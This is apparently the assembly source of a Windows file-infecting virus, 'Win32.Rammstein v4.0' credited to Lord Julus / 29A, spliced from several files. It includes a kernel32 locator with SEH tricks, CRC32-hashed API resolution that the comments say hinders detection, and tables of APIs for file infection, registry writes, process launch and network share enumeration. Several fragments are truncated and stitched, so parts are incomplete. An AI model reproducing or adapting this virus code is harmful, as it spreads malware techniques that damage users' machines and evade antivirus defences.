include rammdata.inc ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
virussize = end-start ;
copyright db 'Win32.Rammstein.' ;
db virussize/10000 mod 10 + '0' ;
db virussize/01000 mod 10 + '0' ;
db virussize/00100 mod 10 + '0' ;
db virussize/00010 mod 10 + '0' ;
db virussize/00001 mod 10 + '0' ;
db ' v4.0', 10,13 ;
db '(c) Lord Julus - 2000 / [29A]',10,13 ;
MainThread endp ;
end2: ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
IF DEBUG ;
debug_end db 'Here is the end of the virus.',0 ;
ENDIF ;
end label ;
end start ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMM.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GET_APIS.ASM]ÄÄÄ
; Locating modules and their exported api addresses routines
;
; Deluxe V2.0 ;-)
;
; (C) Lord Julus / [29A]
;
; This includes the jp/lapse/vecna crc32 macro calculator and the api
; getter is modified to search for the crc32 instead of names. Saves space
; and makes it harder to detect.
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û Locate Kernel32 base address Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
;
; Entry: EAX = dword on stack at startup
; EDX = pointer to kernel32 name
;
; Return: EAX = base address of kernel32 if success
; EAX = 0, CF set if fail
LocateKernel32 proc near
pushad ; save all registers
call @800 ; ...I don't know why I
@800: pop ebx ; had to do this this way,
add ebx, delta3-@800+1 ; but it wouldn't work
mov dword ptr [ebx], ebp ; otherwise...
;
lea ebx, [ebp+try_method_2_error] ; first set up a seh
push ebx ; frame so that if our
push dword ptr fs:[0] ; first method crashes
mov fs:[0], esp ; we will find ourselves
; in the second method
locateloop: ;
cmp dword ptr [eax+0b4h], eax ; first method looks for
je found_k32_kill_seh ; the k32 by checking for
dec eax ; the equal dword at 0b4
cmp eax, 40000000h ;
jbe try_method_2 ;
jmp locateloop ;
;
found_k32_kill_seh: ; if we found it, then we
pop dword ptr fs:[0] ; must destroy the temp
add esp, 4 ; seh frame
mov [esp.pop_eax], eax ;
jmp found_k32 ;
;
try_method_2_error: ; if the first method gave
mov esp, [esp+8] ; and exception error we
delta3: mov ebp, 12345678h ; restore the stack and
; the delta handle
try_method_2: ;
pop dword ptr fs:[0] ; restore the seh state
add esp, 4 ;
popad ; restore registers and
pushad ; save them again
; and go on w/ method two
lea esi, [ebp+offset getmodulehandle] ;
mov ecx, getmodulehandlelen ;
call not_list ;
;
mov ebx, dword ptr [ebp+imagebase] ; now put imagebase in ebx
mov esi, ebx ;
cmp word ptr [esi], 'ZM' ; check if it is an EXE
jne notfound_k32 ;
mov esi, dword ptr [esi.MZ_lfanew] ; get pointer to PE
cmp esi, 1000h ; too far away?
jae notfound_k32 ;
add esi, ebx ;
cmp word ptr [esi], 'EP' ; is it a PE?
jne notfound_k32 ;
add esi, IMAGE_FILE_HEADER_SIZE ; skip header
mov edi, dword ptr [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
add edi, ebx ; and get import RVA
mov ecx, dword ptr [esi.OH_DataDirectory.DE_Import.DD_Size]
add ecx, edi ; and import size
mov eax, edi ; save RVA
;
locateloop2: ;
mov edi, dword ptr [edi.ID_Name] ; get the name
add edi, ebx ;
xor dword ptr [edi], 'öDC2ETBRS' ;
cmp dword ptr [edi], 'NREK' xor 'öDC2ETBRS' ; and compare to KERN
xor dword ptr [edi], 'öDC2ETBRS' ;
je found_the_kernel_import ; if it is not that one
add eax, IMAGE_IMPORT_DESCRIPTOR_SIZE ; skip to the next desc.
mov edi, eax ;
cmp edi, ecx ; but not beyond the size
jae notfound_k32 ; of the descriptor
jmp locateloop2 ;
;
found_the_kernel_import: ; if we found the kernel
mov edi, eax ; import descriptor
mov esi, dword ptr [edi.ID_FirstThunk] ; take the pointer to
add esi, ebx ; addresses
mov edi, dword ptr [edi.ID_Characteristics] ; and the pointer to
add edi, ebx ; names
;
gha_locate_loop: ;
push edi ; save pointer to names
mov edi, dword ptr [edi.TD_AddressOfData] ; go to the actual thunk
add edi, ebx ;
add edi, 2 ; and skip the hint
;
push edi esi ; save these
lea esi, dword ptr [ebp+getmodulehandle] ; and point the name of
mov ecx, getmodulehandlelen ; GetModuleHandleA
rep cmpsb ; see if it is that one
je found_getmodulehandle ; if so...
pop esi edi ; otherwise restore
;
pop edi ; restore arrays indexes
add edi, 4 ; and skip to next
add esi, 4 ;
cmp dword ptr [esi], 0 ; 0? -> end of import
je notfound_k32 ;
jmp gha_locate_loop ;
;
found_getmodulehandle: ;
pop esi ; restore stack
pop edi ;
pop edi ;
;
lea esi, [ebp+offset getmodulehandle] ;
mov ecx, getmodulehandlelen ;
call not_list ;
;
push edx ; push kernel32 name
mov esi, [esi] ; esi = GetModuleHandleA
call esi ; address...
mov [esp.pop_eax], eax ;
or eax, eax ;
jz notfound_k32 ;
;
found_k32: ;
popad ; restore all regs and
clc ; and mark success
ret ;
;
notfound_k32: ;
popad ; restore all regs
xor eax, eax ; and mark the failure...
stc ;
ret ;
LocateKernel32 endp ;
@900 dd 0
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û Locate Apis Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
;
; Entry: EAX = base of module
; ESI = pointer to API name crc32 array
; EDX = pointer to array to receive API addresses
; ECX = how many apis to import
;
; Return: EAX = 0, CF set if fail
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û General module handle retriving routine Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
;
; Entry: EDI = pointer to module name
;
; Return: EAX = module base address if success
; EAX = 0, CF set if fail
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û CRC32 computer for strings Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
push edx ;
mov edx, mCRC32_init ;
;
CRC32_next_byte: ;
lodsb ;
or al, al ;
jz CRC32_finish ;
xor dl, al ;
mov al, 08h ;
;
CRC32_next_bit: ;
shr edx, 01h ;
jnc CRC32_no_change ;
xor edx, mCRC32 ;
;
CRC32_no_change: ;
dec al ;
jnz CRC32_next_bit ;
jmp CRC32_next_byte ;
;
CRC32_finish: ;
xchg eax, edx ;
pop edx ;
ret ;
StringCRC32 endp ;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GET_APIS.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MMX.INC]ÄÄÄ
;****************************************************************************
;* *
;* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY *
;* KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE *
;* IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR *
;* PURPOSE. *
;* *
;* Copyright (C) 1997 Intel Corporation. All Rights Reserved. *
;* *
;****************************************************************************
.486P
ELSE
MM0 TEXTEQU <EAX>
MM1 TEXTEQU <ECX>
MM2 TEXTEQU <EDX>
MM3 TEXTEQU <EBX>
MM4 TEXTEQU <ESP>
MM5 TEXTEQU <EBP>
MM6 TEXTEQU <ESI>
MM7 TEXTEQU <EDI>
UnDefineMMxRegs Macro
MM0 TEXTEQU <MM0>
MM1 TEXTEQU <MM1>
MM2 TEXTEQU <MM2>
MM3 TEXTEQU <MM3>
MM4 TEXTEQU <MM4>
MM5 TEXTEQU <MM5>
MM6 TEXTEQU <MM6>
MM7 TEXTEQU <MM7>
rdpmc macro
db 0fh, opc_Rdpmc
endm
emms macro
db 0fh, opc_Emms
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movd1 macro dst:req, src:req ; MMX->EXX
local x, y
DefineMMxNUM
DefineMMxRegs
x:
cmpxchg dst, src
y:
org x+1
byte opc_Movd_st
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movd2 macro dst:req, src:req ; MEM || EXX || MMX -> MMX
local x, y
DefineMMxNUM
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Movd_ld
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movd3 macro dst:req, src:req ; MMX -> MEM
local x, y
DefineMMxNUM
DefineMMxRegs
x:
cmpxchg dst, src
y:
org x+1
byte opc_Movd_st
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movq1 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Movq_ld
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
movq2 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg dst, src
y:
org x+1
byte opc_Movq_st
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
packssdw macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Packssdw
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
pslld1 macro dst:req, src:req ;; constant
local x, y
DefineMMxRegs
x:
btr dst, src
y:
org x+1
byte opc_PSHimd
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
pslld2 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Pslld
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
psrlq1 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg dst,MM2
byte src
y:
org x+1
byte opc_PSHimq
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
psllq1 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
btr dst, src
y:
org x+1
byte opc_PSHimq
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
psllq2 macro dst:req, src:req
local x, y
DefineMMxRegs
x:
cmpxchg src, dst
y:
org x+1
byte opc_Psllq
org y
UnDefineMMxRegs
endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
k32 dd 0
a32 dd 0
u32 dd 0
g32 dd 0
m32 dd 0
getmodulehandle: noter <GetModuleHandleA>
getmodulehandlelen = $-offset getmodulehandle
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
kernel32apis label
crc32 <LoadLibraryA>
crc32 <GetProcAddress>
crc32 <ExitProcess>
crc32 <CreateThread>
crc32 <ExitThread>
crc32 <SuspendThread>
crc32 <ResumeThread>
crc32 <SetThreadPriority>
crc32 <WaitForSingleObject>
crc32 <WaitForMultipleObjects>
crc32 <WaitForMultipleObjectsEx>
crc32 <CreateFileA>
crc32 <CreateFileMappingA>
crc32 <MapViewOfFile>
crc32 <UnmapViewOfFile>
crc32 <CloseHandle>
crc32 <GetFileAttributesA>
crc32 <GetFileAttributesExA>
crc32 <SetFileAttributesA>
crc32 <GetFileTime>
crc32 <SetFileTime>
crc32 <SetFilePointer>
crc32 <SetEndOfFile>
crc32 <DeleteFileA>
crc32 <FindFirstFileA>
crc32 <FindNextFileA>
crc32 <FindClose>
crc32 <lstrlen>
crc32 <lstrcpy>
crc32 <lstrcat>
crc32 <GetSystemDirectoryA>
crc32 <GetWindowsDirectoryA>
crc32 <GetCurrentDirectoryA>
crc32 <SetCurrentDirectoryA>
crc32 <GetSystemTime>
crc32 <GetTickCount>
crc32 <IsBadReadPtr>
crc32 <CreateSemaphoreA>
crc32 <ReleaseSemaphore>
crc32 <MoveFileA>
crc32 <MoveFileExA>
crc32 <OpenFile>
crc32 <CreateProcessA>
crc32 <WinExec>
crc32 <CopyFileA>
crc32 <CopyFileExA>
crc32 <GetFullPathNameA>
crc32 <GetCompressedFileSizeA>
crc32 <GetDriveTypeA>
crc32 <GetVersionExA>
crc32 <VirtualAlloc>
crc32 <FatalAppExitA>
crc32 <GetFileSize>
crc32 <IsBadWritePtr>
crc32 <GetModuleHandleA>
crc32 <Sleep>
crc32 <GlobalAlloc>
crc32 <GlobalFree>
crc32 <GetModuleFileNameA>
crc32 <WritePrivateProfileStringA>
dd 0
kernel32addr label
_LoadLibraryA dd 0
_GetProcAddress dd 0
_ExitProcess dd 0
_CreateThread dd 0
_ExitThread dd 0
_SuspendThread dd 0
_ResumeThread dd 0
_SetThreadPriority dd 0
_WaitForSingleObject dd 0
_WaitForMultipleObjects dd 0
_WaitForMultipleObjectsEx dd 0
_CreateFileA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_CloseHandle dd 0
_GetFileAttributesA dd 0
_GetFileAttributesExA dd 0
_SetFileAttributesA dd 0
_GetFileTime dd 0
_SetFileTime dd 0
_SetFilePointer dd 0
_SetEndOfFile dd 0
_DeleteFileA dd 0
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_lstrlen dd 0
_lstrcpy dd 0
_lstrcat dd 0
_GetSystemDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_GetSystemTime dd 0
_GetTickCount dd 0
_IsBadReadPtr dd 0
_CreateSemaphoreA dd 0
_ReleaseSemaphore dd 0
_MoveFileA dd 0
_MoveFileExA dd 0
_OpenFile dd 0
_CreateProcessA dd 0
_WinExec dd 0
_CopyFileA dd 0
_CopyFileExA dd 0
_GetFullPathNameA dd 0
_GetCompressedFileSizeA dd 0
_GetDriveTypeA dd 0
_GetVersionExA dd 0
_VirtualAlloc dd 0
_FatalAppExitA dd 0
_GetFileSize dd 0
_IsBadWritePtr dd 0
_GetModuleHandleA dd 0
_Sleep dd 0
_GlobalAlloc dd 0
_GlobalFree dd 0
_GetModuleFileNameA dd 0
_WritePrivateProfileStringA dd 0
kernel32func = ($-offset kernel32addr)/4
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
advapi32apis label
crc32 <RegOpenKeyExA>
crc32 <RegQueryValueExA>
crc32 <RegQueryInfoKeyA>
crc32 <RegEnumValueA>
crc32 <RegSetValueExA>
crc32 <RegCreateKeyExA>
crc32 <RegCloseKey>
dd 0
advapi32addr label
_RegOpenKeyExA dd 0
_RegQueryValueExA dd 0
_RegQueryInfoKeyA dd 0
_RegEnumValueA dd 0
_RegSetValueExA dd 0
_RegCreateKeyExA dd 0
_RegCloseKey dd 0
user32addr label
_SetTimer dd 0
_KillTimer dd 0
_FindWindowA dd 0
_PostMessageA dd 0
_MessageBoxA dd 0
_CharUpperBuffA dd 0
_LoadIconA dd 0
_LoadCursorA dd 0
_GetWindowDC dd 0
_GetClientRect dd 0
_BeginPaint dd 0
_EndPaint dd 0
_GetSystemMetrics dd 0
_GetDC dd 0
_InvalidateRect dd 0
_ShowWindow dd 0
_UpdateWindow dd 0
_GetMessageA dd 0
_TranslateMessage dd 0
_DispatchMessageA dd 0
_PostQuitMessage dd 0
_DefWindowProcA dd 0
_RegisterClassExA dd 0
_CreateWindowExA dd 0
_DestroyWindow dd 0
user32func = ($-offset user32addr)/4
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
gdi32apis label
crc32 <GetStockObject>
crc32 <GetCharWidthA>
crc32 <TextOutA>
crc32 <GetTextMetricsA>
gdi32addr label
_GetStockObject dd 0
_GetCharWidthA dd 0
_TextOutA dd 0
_GetTextMetricsA dd 0
gdi32func = ($-offset gdi32addr)/4
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mpr32apis label
crc32 <WNetOpenEnumA>
crc32 <WNetEnumResourceA>
crc32 <WNetCloseEnum>
mpr32addr label
_WNetOpenEnumA dd 0
_WNetEnumResourceA dd 0
_WNetCloseEnum dd 0
mpr32func = ($-offset mpr32addr)/4
;------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMMDATA.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[W32NT_LJ.INC]ÄÄÄ
comment $
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄ¿ ÚÄ¿
³ ³ This is my transformation of the original WINNT.H ³ ³
³ ³ file from the Microsoft Windows SDK(C) for Windows NT 5.0 ³ ³
³ ³ beta 2 and Windows 98, released on in Sept. 1998. ³ ³
³ ³ This file was transformed by me from the original C ³ ³
³ ³ definition into assembly language. You can use this file to ³ ³
³ ³ quicken up writting your win32 programs in assembler. You ³ ³
³ ³ can use these files as you wish, as they are freeware. ³ ³
³ ³ ³ ³
³ ³ However, if you find any mistake inside this file, ³ ³
³ ³ it is probably due to the fact that I merely could see the ³ ³
³ ³ monitor while converting the files. So, if you do notice ³ ³
³ ³ something, please notify me on my e-mail address at: ³ ³
³ ³ ³ ³
³ ³ lordjulus@geocities.com ³ ³
³ ³ ³ ³
³ ³ Also, if you find any other useful stuff that can be ³ ³
³ ³ included here, do not hesitate to tell me. ³ ³
³ ³ ³ ³
³ ³ Good luck, ³ ³
³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³
³ ³ ³ Lord Julus (c) 1999 ³ ³ ³
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
³ ³ ³ ³
ÀÄÙ ÀÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
DRIVE_UNKNOWN EQU 0
DRIVE_NO_ROOT_DIR EQU 1
DRIVE_REMOVABLE EQU 2
DRIVE_FIXED EQU 3
DRIVE_REMOTE EQU 4
DRIVE_CDROM EQU 5
DRIVE_RAMDISK EQU 6
DLL_PROCESS_ATTACH EQU 1
DLL_THREAD_ATTACH EQU 2
DLL_THREAD_DETACH EQU 3
DLL_PROCESS_DETACH EQU 0
TC_NORMAL EQU 0
TC_HARDERR EQU 1
TC_GP_TRAP EQU 2
TC_SIGNAL EQU 3
EXCEPTION_DEBUG_EVENT EQU 1
CREATE_THREAD_DEBUG_EVENT EQU 2
CREATE_PROCESS_DEBUG_EVENT EQU 3
EXIT_THREAD_DEBUG_EVENT EQU 4
EXIT_PROCESS_DEBUG_EVENT EQU 5
LOAD_DLL_DEBUG_EVENT EQU 6
UNLOAD_DLL_DEBUG_EVENT EQU 7
OUTPUT_DEBUG_STRING_EVENT EQU 8
RIP_EVENT EQU 9
PROCESSOR_ARCHITECTURE_INTEL EQU 0
PROCESSOR_ARCHITECTURE_MIPS EQU 1
PROCESSOR_ARCHITECTURE_ALPHA EQU 2
PROCESSOR_ARCHITECTURE_PPC EQU 3
PROCESSOR_ARCHITECTURE_SHX EQU 4
PROCESSOR_ARCHITECTURE_ARM EQU 5
PROCESSOR_ARCHITECTURE_IA64 EQU 6
PROCESSOR_ARCHITECTURE_ALPHA64 EQU 7
PROCESSOR_ARCHITECTURE_UNKNOWN EQU 0FFFFh
PF_FLOATING_POINT_PRECISION_ERRATA EQU 0
PF_FLOATING_POINT_EMULATED EQU 1
PF_COMPARE_EXCHANGE_DOUBLE EQU 2
PF_MMX_INSTRUCTIONS_AVAILABLE EQU 3
PF_PPC_MOVEMEM_64BIT_OK EQU 4
PF_ALPHA_BYTE_INSTRUCTIONS EQU 5
PF_XMMI_INSTRUCTIONS_AVAILABLE EQU 6
PF_AMD3D_INSTRUCTIONS_AVAILABLE EQU 7
PF_RDTSC_INSTRUCTION_AVAILABLE EQU 8
SYSTEM_FLAG_REMOTE_BOOT_CLIENT EQU 00000001h
SYSTEM_FLAG_DISKLESS_CLIENT EQU 00000002h
INVALID_HANDLE_VALUE EQU -1
INVALID_FILE_SIZE EQU 0FFFFFFFFh
STD_INPUT_HANDLE EQU -10
STD_OUTPUT_HANDLE EQU -11
STD_ERROR_HANDLE EQU -12
MAILSLOT_NO_MESSAGE EQU -1
MAILSLOT_WAIT_FOREVER EQU -1
CREATE_NEW EQU 1
CREATE_ALWAYS EQU 2
OPEN_EXISTING EQU 3
OPEN_ALWAYS EQU 4
TRUNCATE_EXISTING EQU 5
HINSTANCE_ERROR EQU 32
FILE_ENCRYPTABLE EQU 0
FILE_IS_ENCRYPTED EQU 1
FILE_SYSTEM_ATTR EQU 2
FILE_ROOT_DIR EQU 3
FILE_SYSTEM_DIR EQU 4
FILE_UNKNOWN EQU 5
FILE_SYSTEM_NOT_SUPPORT EQU 6
FILE_USER_DISALLOWED EQU 7
FILE_READ_ONLY EQU 8
EXCEPTION_NONCONTINUABLE EQU 1
EXCEPTION_MAXIMUM_PARAMETERS EQU 15
VER_PLATFORM_WIN32s EQU 0
VER_PLATFORM_WIN32_WINDOWS EQU 1
VER_PLATFORM_WIN32_NT EQU 2
VER_EQUAL EQU 1
VER_GREATER EQU 2
VER_GREATER_EQUAL EQU 3
VER_LESS EQU 4
VER_LESS_EQUAL EQU 5
VER_AND EQU 6
VER_OR EQU 7
; PE File Characteristics
; PE Machine type
IMAGE_FILE_MACHINE_UNKNOWN EQU 0
IMAGE_FILE_MACHINE_I386 EQU 014ch ; Intel 386.
IMAGE_FILE_MACHINE_R3000 EQU 0162h ; MIPS little-endian, 160 big-endian
IMAGE_FILE_MACHINE_R4000 EQU 0166h ; MIPS little-endian
IMAGE_FILE_MACHINE_R10000 EQU 0168h ; MIPS little-endian
IMAGE_FILE_MACHINE_WCEMIPSV2 EQU 0169h ; MIPS little-endian WCE v2
IMAGE_FILE_MACHINE_ALPHA EQU 0184h ; Alpha_AXP
IMAGE_FILE_MACHINE_POWERPC EQU 01F0h ; IBM PowerPC Little-Endian
IMAGE_FILE_MACHINE_SH3 EQU 01a2h ; SH3 little-endian
IMAGE_FILE_MACHINE_SH3E EQU 01a4h ; SH3E little-endian
IMAGE_FILE_MACHINE_SH4 EQU 01a6h ; SH4 little-endian
IMAGE_FILE_MACHINE_ARM EQU 01c0h ; ARM Little-Endian
IMAGE_FILE_MACHINE_THUMB EQU 01c2h
IMAGE_FILE_MACHINE_IA64 EQU 0200h ; Intel 64
IMAGE_FILE_MACHINE_MIPS16 EQU 0266h ; MIPS
IMAGE_FILE_MACHINE_MIPSFPU EQU 0366h ; MIPS
IMAGE_FILE_MACHINE_MIPSFPU16 EQU 0466h ; MIPS
IMAGE_FILE_MACHINE_ALPHA64 EQU 0284h ; ALPHA64
IMAGE_FILE_MACHINE_AXP64 EQU IMAGE_FILE_MACHINE_ALPHA64
IMAGE_NUMBEROF_DIRECTORY_ENTRIES EQU 16
IMAGE_SIZEOF_STD_OPTIONAL_HEADER EQU 28
IMAGE_SIZEOF_NT_OPTIONAL_HEADER EQU 224
IMAGE_NT_OPTIONAL_HDR_MAGIC EQU 10bh
; Directory Entries
IMAGE_SIZEOF_SHORT_NAME EQU 8
IMAGE_SIZEOF_SECTION_HEADER EQU 40
; Section Characteristics
IMAGE_SIZEOF_SYMBOL EQU 18
IMAGE_SYM_CLASS_END_OF_FUNCTION EQU -1
IMAGE_SYM_CLASS_NULL EQU 0000h
IMAGE_SYM_CLASS_AUTOMATIC EQU 0001h
IMAGE_SYM_CLASS_EXTERNAL EQU 0002h
IMAGE_SYM_CLASS_STATIC EQU 0003h
IMAGE_SYM_CLASS_REGISTER EQU 0004h
IMAGE_SYM_CLASS_EXTERNAL_DEF EQU 0005h
